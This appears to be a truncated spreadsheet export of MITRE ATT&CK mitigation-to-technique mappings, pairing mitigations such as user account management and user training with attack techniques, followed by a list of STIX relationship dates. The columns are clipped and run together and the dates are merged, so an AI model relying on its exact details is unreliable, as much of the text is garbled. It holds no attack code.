M1022 Restrict Fi course-of- mitigation mitigates T1053.006Systemd Tiattack-pat technique Restrict re
M1022 Restrict Fi course-of- mitigation mitigates T1548.006TCC Manipu attack-pat technique When using
M1022 Restrict Fi course-of- mitigation mitigates T1080 Taint Shar attack-pat technique Protect sha
M1022 Restrict Fi course-of- mitigation mitigates T1547.003Time Proviattack-pat technique Consider u
M1022 Restrict Fi course-of- mitigation mitigates T1546.004Unix Shell attack-pat technique Making thes
M1022 Restrict Fi course-of- mitigation mitigates T1552 Unsecuredattack-pat technique Restrict fi
M1022 Restrict Fi course-of- mitigation mitigates T1222.001Windows Fiattack-pat technique Applying mo
M1022 Restrict Fi course-of- mitigation mitigates T1547.013XDG Autostattack-pat technique Restrict wr
M1044 Restrict Li course-of- mitigation mitigates T1574.001DLL Searchattack-pat technique The Safe DLL Search Mode ca
M1044 Restrict Li course-of- mitigation mitigates T1574 Hijack Exe attack-pat technique The Safe DLL Search Mode ca
M1044 Restrict Li course-of- mitigation mitigates T1547.008LSASS Driv attack-pat technique Ensure saf
M1024 Restrict Recourse-of- mitigation mitigates T1037 Boot or Logattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1574.012COR_PROFIattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1070.007Clear Netwattack-pat technique Protect gen
M1024 Restrict Recourse-of- mitigation mitigates T1553.006Code Signinattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1562.002Disable Wiattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1562.004Disable or attack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1562.001Disable or attack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1562 Impair Defattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1037.001Logon Scri attack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1556 Modify Autattack-pat technique Restrict R
M1024 Restrict Recourse-of- mitigation mitigates T1112 Modify Regattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1556.008Network Prattack-pat technique Restrict R
M1024 Restrict Recourse-of- mitigation mitigates T1553.003SIP and Truattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1505 Server Sof attack-pat technique Consider us
M1024 Restrict Recourse-of- mitigation mitigates T1489 Service Stoattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1574.011Services R attack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1553 Subvert Truattack-pat technique Ensure prop
M1024 Restrict Recourse-of- mitigation mitigates T1505.005Terminal Sattack-pat technique Consider us
M1024 Restrict Recourse-of- mitigation mitigates T1547.003Time Proviattack-pat technique Consider u
M1021 Restrict W course-of- mitigation mitigates T1550.001Applicatio attack-pat technique Update corp
M1021 Restrict W course-of- mitigation mitigates T1102.002Bidirectio attack-pat technique Web
Disable proxie
ClickOnce installation
M1021 Restrict W course-of- mitigation mitigates T1127.002ClickOnce attack-pat technique `\HKEY_LOCAL_MACHINE\SO
M1021 Restrict W course-of- mitigation mitigates T1059 Command attack-pat
an technique Script bloc
M1021 Restrict W course-of- mitigation mitigates T1218.001Compiled Hattack-pat technique Consider b
M1021 Restrict W course-of- mitigation mitigates T1659 Content Injattack-pat technique Consider b
M1021 Restrict W course-of- mitigation mitigates T1555.003Credential attack-pat technique Restrict or
M1021 Restrict W course-of- mitigation mitigates T1102.001Dead Dropattack-pat technique Web proxie
M1021 Restrict W course-of- mitigation mitigates T1568.002Domain Gen attack-pat technique In some ca
M1021 Restrict W course-of- mitigation mitigates T1189 Drive-by C attack-pat technique Script blocking extensions ca
M1021 Restrict W course-of- mitigation mitigates T1568 Dynamic Reattack-pat technique In some cas
M1021 Restrict W course-of- mitigation mitigates T1567 Exfiltratio attack-pat technique Web proxie
M1021 Restrict W course-of- mitigation mitigates T1567.002Exfiltratio attack-pat technique Web proxie
M1021 Restrict W course-of- mitigation mitigates T1567.001Exfiltratio attack-pat technique Web proxie
M1021 Restrict W course-of- mitigation mitigates T1567.003Exfiltratio attack-pat technique Web proxie
M1021 Restrict W course-of- mitigation mitigates T1059.007JavaScript attack-pat technique Script bloc
M1021 Restrict W course-of- mitigation mitigates T1204.001Malicious Lattack-pat technique If a link i
M1021 Restrict W course-of- mitigation mitigates T1102.003One-Way Cattack-pat technique Web proxie
M1021 Restrict W course-of- mitigation mitigates T1566 Phishing attack-pat technique Determine i
M1021 Restrict W course-of- mitigation mitigates T1566.001Spearphishattack-pat technique Block unkno
M1021 Restrict W course-of- mitigation mitigates T1566.002Spearphishattack-pat technique Determine i
M1021 Restrict W course-of- mitigation mitigates T1566.003Spearphishiattack-pat technique "Users
Determine i settings -> App
-> User
M1021 Restrict W course-of- mitigation mitigates T1528 Steal Appliattack-pat technique "Enterprise applications -> U
M1021 Restrict W course-of- mitigation mitigates T1539 Steal Web attack-pat technique Restrict or
M1021 Restrict W course-of- mitigation mitigates T1218 System Binattack-pat technique Restrict us
M1021 Restrict W course-of- mitigation mitigates T1127 Trusted Dev attack-pat technique Consider di
M1021 Restrict W course-of- mitigation mitigates T1204 User Execuattack-pat technique If a link i
M1021 Restrict W course-of- mitigation mitigates T1059.005Visual Basiattack-pat technique Script bloc
M1021 Restrict W course-of- mitigation mitigates T1102 Web Servicattack-pat technique Web proxie
M1020 SSL/TLS In course-of- mitigation mitigates T1573.002Asymmetricattack-pat technique SSL/TLS ins
M1020 SSL/TLS In course-of- mitigation mitigates T1090.004Domain Froattack-pat technique If it is po
M1020 SSL/TLS In course-of- mitigation mitigates T1573 Encrypted attack-pat technique SSL/TLS ins
M1020 SSL/TLS In course-of- mitigation mitigates T1090 Proxy attack-pat technique If it is po
M1054 Software Ccourse-of- mitigation mitigates T1543.005Container attack-pat technique Where possi
M1054 Software Ccourse-of- mitigation mitigates T1543 Create or attack-pat technique Where possi
M1054 Software Ccourse-of- mitigation mitigates T1213.004Customer Rattack-pat technique Consider im
M1054 Software Ccourse-of- mitigation mitigates T1590.002DNS attack-pat technique Consider im
M1054 Software Ccourse-of- mitigation mitigates T1602 Data from attack-pat technique Allowlist
M1054 Software Ccourse-of- mitigation mitigates T1213 Data from attack-pat technique Consider im
M1054 Software Ccourse-of- mitigation mitigates T1562.010Downgradeattack-pat technique Consider im
M1054 Software Ccourse-of- mitigation mitigates T1559.002Dynamic Daattack-pat technique Consider d
M1054 Software Ccourse-of- mitigation mitigates T1606 Forge Webattack-pat technique Configure b
M1054 Software Ccourse-of- mitigation mitigates T1562 Impair Defattack-pat technique Consider im
M1054 Software Ccourse-of- mitigation mitigates T1562.006Indicator Battack-pat technique Consider au
M1054 Software Ccourse-of- mitigation mitigates T1553.004Install Rootattack-pat technique HTTP Public
M1054 Software Ccourse-of- mitigation mitigates T1559 Inter-Proc attack-pat technique Consider d
M1054 Software Ccourse-of- mitigation mitigates T1666 Modify Cloattack-pat technique In Azure en
M1054 Software Ccourse-of- mitigation mitigates T1602.002Network Deattack-pat technique Allowlist M
M1054 Software Ccourse-of- mitigation mitigates T1137 Office Applattack-pat technique For the Off
M1054 Software Ccourse-of- mitigation mitigates T1137.002Office Testattack-pat technique Create the
M1054 Software Ccourse-of- mitigation mitigates T1555.005Password attack-pat technique Consider re
M1054 Software Ccourse-of- mitigation mitigates T1566 Phishing attack-pat technique Use anti-sp
M1054 Software Ccourse-of- mitigation mitigates T1598 Phishing foattack-pat technique Use anti-sp
M1054 Software Ccourse-of- mitigation mitigates T1546.013PowerShellattack-pat technique Avoid Power
M1054 Software Ccourse-of- mitigation mitigates T1602.001SNMP (MIBattack-pat technique Allowlist
M1054 Software Ccourse-of- mitigation mitigates T1562.009Safe Modeattack-pat technique Ensure tha
M1054 Software Ccourse-of- mitigation mitigates T1566.001Spearphishattack-pat technique Use anti-sp
M1054 Software Ccourse-of- mitigation mitigates T1598.002Spearphishattack-pat technique Use anti-sp
M1054 Software Ccourse-of- mitigation mitigates T1566.002Spearphishattack-pat technique Furthermore, policies may en
M1054 Software Ccourse-of- mitigation mitigates T1598.003Spearphishattack-pat technique Furthermore, policies may en
M1054 Software Ccourse-of- mitigation mitigates T1539 Steal Web attack-pat technique Additionally, minimize the len
M1054 Software Ccourse-of- mitigation mitigates T1553 Subvert Truattack-pat technique HTTP Public
M1054 Software Ccourse-of- mitigation mitigates T1537 Transfer D attack-pat technique Configure a
M1054 Software Ccourse-of- mitigation mitigates T1535 Unused/Uns attack-pat technique Cloud servi
M1054 Software Ccourse-of- mitigation mitigates T1606.001Web Cookiattack-pat technique Configure b
M1054 Software Ccourse-of- mitigation mitigates T1550.004Web Sessioattack-pat technique Configure b
M1019 Threat Int course-of- mitigation mitigates T1212 Exploitatioattack-pat technique Develop a r
M1019 Threat Int course-of- mitigation mitigates T1211 Exploitatioattack-pat technique Develop a r
M1019 Threat Int course-of- mitigation mitigates T1068 Exploitatioattack-pat technique Develop a r
M1019 Threat Int course-of- mitigation mitigates T1210 Exploitatioattack-pat technique Develop a r
M1019 Threat Int course-of- mitigation mitigates T1656 Impersonatattack-pat technique Threat int
M1051 Update Sofcourse-of- mitigation mitigates T1548 Abuse Elevattack-pat technique Perform reg
M1051 Update Sofcourse-of- mitigation mitigates T1546.010AppInit DL attack-pat technique Upgrade to
M1051 Update Sofcourse-of- mitigation mitigates T1546.011Applicatio attack-pat technique Microsoft r
M1051 Update Sofcourse-of- mitigation mitigates T1176 Browser Exattack-pat technique Ensure oper
M1051 Update Sofcourse-of- mitigation mitigates T1548.002Bypass Useattack-pat technique Consider up
M1051 Update Sofcourse-of- mitigation mitigates T1542.002Componentattack-pat technique Perform reg
M1051 Update Sofcourse-of- mitigation mitigates T1195.001Compromise attack-pat technique A patch ma
M1051 Update Sofcourse-of- mitigation mitigates T1195.002Compromise attack-pat technique A patch ma
M1051 Update Sofcourse-of- mitigation mitigates T1555 Credential attack-pat technique Perform reg
M1051 Update Sofcourse-of- mitigation mitigates T1555.003Credential attack-pat technique Regularly u
M1051 Update Sofcourse-of- mitigation mitigates T1574.002DLL Side-L attack-pat technique Update soft
M1051 Update Sofcourse-of- mitigation mitigates T1602 Data from attack-pat technique Keep syste
M1051 Update Sofcourse-of- mitigation mitigates T1189 Drive-by C attack-pat technique Ensure all
M1051 Update Sofcourse-of- mitigation mitigates T1546 Event Trig attack-pat technique Perform reg
M1051 Update Sofcourse-of- mitigation mitigates T1190 Exploit Pubattack-pat technique Update sof
M1051 Update Sofcourse-of- mitigation mitigates T1203 Exploitatioattack-pat technique Perform reg
M1051 Update Sofcourse-of- mitigation mitigates T1212 Exploitatioattack-pat technique Update sof
M1051 Update Sofcourse-of- mitigation mitigates T1211 Exploitatioattack-pat technique Update sof
M1051 Update Sofcourse-of- mitigation mitigates T1068 Exploitatioattack-pat technique Update sof
M1051 Update Sofcourse-of- mitigation mitigates T1210 Exploitatioattack-pat technique Update sof
M1051 Update Sofcourse-of- mitigation mitigates T1495 Firmware Cattack-pat technique Patch the B
M1051 Update Sofcourse-of- mitigation mitigates T1552.006Group Poliattack-pat technique Apply patc
M1051 Update Sofcourse-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Update soft
M1051 Update Sofcourse-of- mitigation mitigates T1602.002Network Deattack-pat technique Keep syste
M1051 Update Sofcourse-of- mitigation mitigates T1137 Office Applattack-pat technique For the Out
M1051 Update Sofcourse-of- mitigation mitigates T1137.003Outlook Foattack-pat technique For the Out
M1051 Update Sofcourse-of- mitigation mitigates T1137.004Outlook H attack-pat technique For the Out
M1051 Update Sofcourse-of- mitigation mitigates T1137.005Outlook Ruattack-pat technique For the Out
M1051 Update Sofcourse-of- mitigation mitigates T1550.002Pass the H attack-pat technique Apply patch
M1051 Update Sofcourse-of- mitigation mitigates T1110.001Password Gattack-pat technique Upgrade man
M1051 Update Sofcourse-of- mitigation mitigates T1555.005Password attack-pat technique Regularly u
M1051 Update Sofcourse-of- mitigation mitigates T1542 Pre-OS Booattack-pat technique Patch the B
M1051 Update Sofcourse-of- mitigation mitigates T1602.001SNMP (MIBattack-pat technique Keep syste
M1051 Update Sofcourse-of- mitigation mitigates T1072 Software Dattack-pat technique Patch deplo
M1051 Update Sofcourse-of- mitigation mitigates T1539 Steal Web attack-pat technique Regularly u
M1051 Update Sofcourse-of- mitigation mitigates T1195 Supply Chaattack-pat technique A patch ma
M1051 Update Sofcourse-of- mitigation mitigates T1542.001System Fi attack-pat technique Patch the B
M1051 Update Sofcourse-of- mitigation mitigates T1552 Unsecuredattack-pat technique Apply patc
M1052 User Accoucourse-of- mitigation mitigates T1548 Abuse Elevattack-pat technique Although UA
M1052 User Accoucourse-of- mitigation mitigates T1546.011Applicatio attack-pat technique Changing UA
M1052 User Accoucourse-of- mitigation mitigates T1548.002Bypass Useattack-pat technique Although UA
M1052 User Accoucourse-of- mitigation mitigates T1574.005Executableattack-pat technique Turn off UA
M1052 User Accoucourse-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Turn off UA
M1052 User Accoucourse-of- mitigation mitigates T1550.002Pass the H attack-pat technique Through GPO: Computer Con
M1052 User Accoucourse-of- mitigation mitigates T1574.010Services F attack-pat technique Turn off UA
M1018 User Acco course-of- mitigation mitigates T1548 Abuse Elevattack-pat technique Limit the p
M1018 User Acco course-of- mitigation mitigates T1134 Access Tokattack-pat technique An adversar
M1018 User Acco course-of- mitigation mitigates T1087 Account Diattack-pat technique Manage the
M1018 User Acco course-of- mitigation mitigates T1098 Account Ma attack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1098.001Additional attack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1098.003Additional attack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1098.006Additional attack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1053.002At attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1197 BITS Jobs attack-pat technique Consider limiting access to th
M1018 User Acco course-of- mitigation mitigates T1185 Browser Seattack-pat technique Since brows
M1018 User Acco course-of- mitigation mitigates T1110 Brute Forc attack-pat technique Proactively
M1018 User Acco course-of- mitigation mitigates T1574.012COR_PROFIattack-pat technique Limit the p
M1018 User Acco course-of- mitigation mitigates T1087.004Cloud Accoattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Periodicall
M1018 User Acco course-of- mitigation mitigates T1580 Cloud Infraattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1538 Cloud Servattack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1619 Cloud Stor attack-pat technique Restrict gr
M1018 User Acco course-of- mitigation mitigates T1213.003Code Reposattack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1556.009Conditionalattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1213.001Confluenceattack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1552.007Container attack-pat technique Enforce aut
M1018 User Acco course-of- mitigation mitigates T1609 Container attack-pat technique Enforce aut
M1018 User Acco course-of- mitigation mitigates T1053.007Container attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1543.005Container attack-pat technique Limit acces
M1018 User Acco course-of- mitigation mitigates T1613 Container attack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1578.002Create Clo attack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1134.002Create Proattack-pat technique An adversar
M1018 User Acco course-of- mitigation mitigates T1578.001Create Snaattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1543 Create or attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1110.004Credential attack-pat technique Proactively
M1018 User Acco course-of- mitigation mitigates T1555.003Credential attack-pat technique Implement s
M1018 User Acco course-of- mitigation mitigates T1053.003Cron attack-pat technique <code>cron<
M1018 User Acco course-of- mitigation mitigates T1213.004Customer Rattack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1485 Data Destrattack-pat technique In cloud en
M1018 User Acco course-of- mitigation mitigates T1530 Data from attack-pat technique Configure u
M1018 User Acco course-of- mitigation mitigates T1213 Data from attack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1578.003Delete Clo attack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1610 Deploy Conattack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1021.008Direct Clo attack-pat technique Limit which
M1018 User Acco course-of- mitigation mitigates T1006 Direct Vol attack-pat technique Ensure only
M1018 User Acco course-of- mitigation mitigates T1562.002Disable Wiattack-pat technique Ensure prop
M1018 User Acco course-of- mitigation mitigates T1562.007Disable or attack-pat technique Ensure leas
M1018 User Acco course-of- mitigation mitigates T1562.008Disable or attack-pat technique Configure d
M1018 User Acco course-of- mitigation mitigates T1562.012Disable or attack-pat technique An adversar
M1018 User Acco course-of- mitigation mitigates T1562.004Disable or attack-pat technique Ensure prop
M1018 User Acco course-of- mitigation mitigates T1562.001Disable or attack-pat technique Ensure prop
M1018 User Acco course-of- mitigation mitigates T1078.002Domain Acattack-pat technique Regularly r
M1018 User Acco course-of- mitigation mitigates T1484 Domain or attack-pat technique Consider im
M1018 User Acco course-of- mitigation mitigates T1574.005Executableattack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1048 Exfiltratio attack-pat technique Configure u
M1018 User Acco course-of- mitigation mitigates T1657 Financial Tattack-pat technique Limit acces
M1018 User Acco course-of- mitigation mitigates T1606 Forge Webattack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1484.001Group Poliattack-pat technique Consider im
M1018 User Acco course-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Ensure that proper permissio
M1018 User Acco course-of- mitigation mitigates T1562 Impair Defattack-pat technique Ensure prop
M1018 User Acco course-of- mitigation mitigates T1562.006Indicator Battack-pat technique Ensure even
M1018 User Acco course-of- mitigation mitigates T1490 Inhibit Sy attack-pat technique Use
LimitMDM
the uto disable user's ab
M1018 User Acco course-of- mitigation mitigates T1547.006Kernel Modattack-pat technique
M1018 User Acco course-of- mitigation mitigates T1543.004Launch Da attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1569.001Launchctl attack-pat technique Prevent use
M1018 User Acco course-of- mitigation mitigates T1485.001Lifecycle-Tattack-pat technique In cloud en
M1018 User Acco course-of- mitigation mitigates T1078.003Local Acco attack-pat technique Enforce use
M1018 User Acco course-of- mitigation mitigates T1654 Log Enumerattack-pat technique Limit the a
M1018 User Acco course-of- mitigation mitigates T1134.003Make and attack-pat technique An adversar
M1018 User Acco course-of- mitigation mitigates T1036.010Masqueradattack-pat technique Consider de
M1018 User Acco course-of- mitigation mitigates T1036 Masqueradattack-pat technique Consider de
M1018 User Acco course-of- mitigation mitigates T1556 Modify Autattack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1578.005Modify Cloattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1578 Modify Cloattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1666 Modify Cloattack-pat technique Limit permi
M1018 User Acco course-of- mitigation mitigates T1556.006Multi-Fact attack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1059.008Network Deattack-pat technique Use of Auth
M1018 User Acco course-of- mitigation mitigates T1040 Network Snattack-pat technique In cloud en
M1018 User Acco course-of- mitigation mitigates T1550.002Pass the H attack-pat technique Do not allo
M1018 User Acco course-of- mitigation mitigates T1550.003Pass the Tiattack-pat technique Do not allo
M1018 User Acco course-of- mitigation mitigates T1555.005Password attack-pat technique Implement s
M1018 User Acco course-of- mitigation mitigates T1547.012Print Proceattack-pat technique Limit user
M1018 User Acco course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Limit remot
M1018 User Acco course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Limit remot
M1018 User Acco course-of- mitigation mitigates T1563 Remote Serattack-pat technique Limit remot
M1018 User Acco course-of- mitigation mitigates T1021 Remote Serattack-pat technique Limit the a
M1018 User Acco course-of- mitigation mitigates T1606.002SAML Tokeattack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1021.004SSH attack-pat technique Limit which
M1018 User Acco course-of- mitigation mitigates T1098.004SSH Authorattack-pat technique In cloud en
M1018 User Acco course-of- mitigation mitigates T1053.005Scheduled attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1053 Scheduled attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1505 Server Sof attack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1648 Serverless attack-pat technique Remove perm
M1018 User Acco course-of- mitigation mitigates T1489 Service Stoattack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1574.010Services F attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1213.002Sharepointattack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1547.009Shortcut Mattack-pat technique Regular User Permissions Rev
M1018 User Acco course-of- mitigation mitigates T1072 Software Dattack-pat technique Ensure that
M1018 User Acco course-of- mitigation mitigates T1566.001Spearphishattack-pat technique Apply user
M1018 User Acco course-of- mitigation mitigates T1566.002Spearphishattack-pat technique Azure AD Ad
M1018 User Acco course-of- mitigation mitigates T1566.003Spearphishiattack-pat technique Enforce str
M1018 User Acco course-of- mitigation mitigates T1528 Steal Appliattack-pat technique Enforce rol
M1018 User Acco course-of- mitigation mitigates T1195 Supply Chaattack-pat technique Implement r
M1018 User Acco course-of- mitigation mitigates T1569 System Serattack-pat technique Prevent use
M1018 User Acco course-of- mitigation mitigates T1543.002Systemd Seattack-pat technique Limit user
M1018 User Acco course-of- mitigation mitigates T1053.006Systemd Tiattack-pat technique Limit user
M1018 User Acco course-of- mitigation mitigates T1548.005Temporaryattack-pat technique Limit the p
M1018 User Acco course-of- mitigation mitigates T1134.001Token Impeattack-pat technique An adversar
M1018 User Acco course-of- mitigation mitigates T1020.001Traffic Dupattack-pat technique In cloud en
M1018 User Acco course-of- mitigation mitigates T1537 Transfer D attack-pat technique Limit user
M1018 User Acco course-of- mitigation mitigates T1484.002Trust Modifattack-pat technique In cloud en
Properly manage accounts an
M1018 User Acco course-of- mitigation mitigates T1199 Trusted Relattack-pat technique
M1018 User Acco course-of- mitigation mitigates T1550 Use Altern attack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1078 Valid Acco attack-pat technique Regularly a
M1018 User Acco course-of- mitigation mitigates T1505.003Web Shell attack-pat technique Enforce the
M1018 User Acco course-of- mitigation mitigates T1047 Windows M attack-pat technique By default,
M1018 User Acco course-of- mitigation mitigates T1546.003Windows Ma attack-pat technique By default,
M1018 User Acco course-of- mitigation mitigates T1543.003Windows Se attack-pat technique Limit privi
M1018 User Acco course-of- mitigation mitigates T1547.004Winlogon Hattack-pat technique Limit the p
M1018 User Acco course-of- mitigation mitigates T1547.013XDG Autostattack-pat technique Limit privi
M1017 User Trainicourse-of- mitigation mitigates T1557.002ARP Cache attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1557 Adversary-attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1176 Browser Exattack-pat technique Close out all browser session
M1017 User Trainicourse-of- mitigation mitigates T1185 Browser Seattack-pat technique Close all b
M1017 User Trainicourse-of- mitigation mitigates T1003.005Cached Dom attack-pat technique Limit crede
M1017 User Trainicourse-of- mitigation mitigates T1552.008Chat Mess attack-pat technique Ensure tha
M1017 User Trainicourse-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Application
M1017 User Trainicourse-of- mitigation mitigates T1213.003Code Reposattack-pat technique Develop and
M1017 User Trainicourse-of- mitigation mitigates T1213.001Confluenceattack-pat technique Develop and
M1017 User Trainicourse-of- mitigation mitigates T1552.001Credentialsattack-pat technique Ensure that
M1017 User Trainicourse-of- mitigation mitigates T1555.003Credential attack-pat technique Provide use
M1017 User Trainicourse-of- mitigation mitigates T1213.004Customer Rattack-pat technique Develop and
M1017 User Trainicourse-of- mitigation mitigates T1213 Data from attack-pat technique Develop and
M1017 User Trainicourse-of- mitigation mitigates T1078.002Domain Acattack-pat technique Application
M1017 User Trainicourse-of- mitigation mitigates T1556.001Domain Con attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1036.007Double Fileattack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1557.004Evil Twin attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1657 Financial Tattack-pat technique Train and e
M1017 User Trainicourse-of- mitigation mitigates T1056.002GUI Input attack-pat technique Use user tr
M1017 User Trainicourse-of- mitigation mitigates T1656 Impersonatattack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1003.004LSA Secret attack-pat technique Limit crede
M1017 User Trainicourse-of- mitigation mitigates T1003.001LSASS Memattack-pat technique Limit crede
M1017 User Trainicourse-of- mitigation mitigates T1204.002Malicious Fattack-pat technique Use user tr
M1017 User Trainicourse-of- mitigation mitigates T1204.003Malicious attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1204.001Malicious Lattack-pat technique Use user tr
M1017 User Trainicourse-of- mitigation mitigates T1036 Masqueradattack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1213.005Messaging attack-pat technique Develop and
M1017 User Trainicourse-of- mitigation mitigates T1111 Multi-Factoattack-pat technique Remove sma
M1017 User Trainicourse-of- mitigation mitigates T1621 Multi-Fact attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1003.003NTDS attack-pat technique Limit crede
M1017 User Trainicourse-of- mitigation mitigates T1003 OS Credentattack-pat technique Limit crede
M1017 User Trainicourse-of- mitigation mitigates T1027 Obfuscatedattack-pat technique Ensure that
M1017 User Trainicourse-of- mitigation mitigates T1555.005Password attack-pat technique Provide use
M1017 User Trainicourse-of- mitigation mitigates T1566 Phishing attack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1598 Phishing foattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1547.007Re-openedattack-pat technique Holding the
M1017 User Trainicourse-of- mitigation mitigates T1003.002Security A attack-pat technique Limit crede
M1017 User Trainicourse-of- mitigation mitigates T1213.002Sharepointattack-pat technique Develop and
M1017 User Trainicourse-of- mitigation mitigates T1072 Software Dattack-pat technique Have a stri
M1017 User Trainicourse-of- mitigation mitigates T1566.001Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1598.002Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1566.002Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1598.003Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1598.001Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1598.004Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1566.004Spearphishattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1566.003Spearphishiattack-pat technique Users can b
M1017 User Trainicourse-of- mitigation mitigates T1528 Steal Appliattack-pat technique Users need
M1017 User Trainicourse-of- mitigation mitigates T1539 Steal Web attack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1221 Template Iattack-pat technique Train users
M1017 User Trainicourse-of- mitigation mitigates T1552 Unsecuredattack-pat technique Ensure that
M1017 User Trainicourse-of- mitigation mitigates T1204 User Execuattack-pat technique Use user tr
M1017 User Trainicourse-of- mitigation mitigates T1078 Valid Acco attack-pat technique Application
M1016 Vulnerabilicourse-of- mitigation mitigates T1195.001Compromise attack-pat technique Continuous
M1016 Vulnerabilicourse-of- mitigation mitigates T1195.002Compromise attack-pat technique Continuous
M1016 Vulnerabilicourse-of- mitigation mitigates T1190 Exploit Pubattack-pat technique Regularly s
M1016 Vulnerabilicourse-of- mitigation mitigates T1210 Exploitatioattack-pat technique Regularly s
M1016 Vulnerabilicourse-of- mitigation mitigates T1195 Supply Chaattack-pat technique Continuous
STIX ID createdlast modified
relationsh 16 October16 October 2024
relationsh 13 June 2028 May 2024
relationsh 21 Februar16 March 2023
relationsh 20 Februar28 May 2024
relationsh 01 April 2021 February 2023
relationsh 20 Februar28 May 2024
relationsh 20 Februar28 May 2024
relationsh 01 July 20 02 October 2024
relationsh 16 October16 October 2024
relationsh 14 April 2014 April 2023
relationsh 29 May 20 29 May 2020
relationsh 21 Februar22 February 2023
relationsh 19 Februar22 April 2021
relationsh 27 Februar05 November 2020
relationsh 17 June 2017 June 2020
relationsh 17 July 20 28 May 2024
relationsh 30 January31 August 2021
relationsh 22 January03 January 2024
relationsh 18 Februar09 February 2021
relationsh 18 July 20 11 December 2020
relationsh 03 August 21 October 2022
relationsh 28 Februar08 March 2022
relationsh 04 Februar16 March 2021
relationsh 01 March 01 March 2024
relationsh 14 April 2014 April 2023
relationsh 14 March 20 March 2023
relationsh 23 June 2027 March 2022
relationsh 18 October18 October 2022
relationsh 29 March 11 April 2024
relationsh 29 March 29 March 2024
relationsh 29 March 29 March 2024
relationsh 24 January31 March 2022
relationsh 29 Septem29 September 2023
relationsh 08 March 08 March 2023
relationsh 11 April 2011 April 2023
relationsh 25 June 2020 March 2023
relationsh 02 March 27 September 2021
relationsh 27 Septem03 October 2024
relationsh 23 June 2024 January 2022
relationsh 23 June 2026 July 2021
relationsh 05 Februar11 March 2022
relationsh 02 March 18 October 2021
relationsh 02 March 18 October 2020
relationsh 31 May 20 16 October 2023
relationsh 25 June 2012 January 2022
relationsh 23 June 2007 March 2022
relationsh 28 March 12 April 2024
relationsh 09 August 09 August 2022
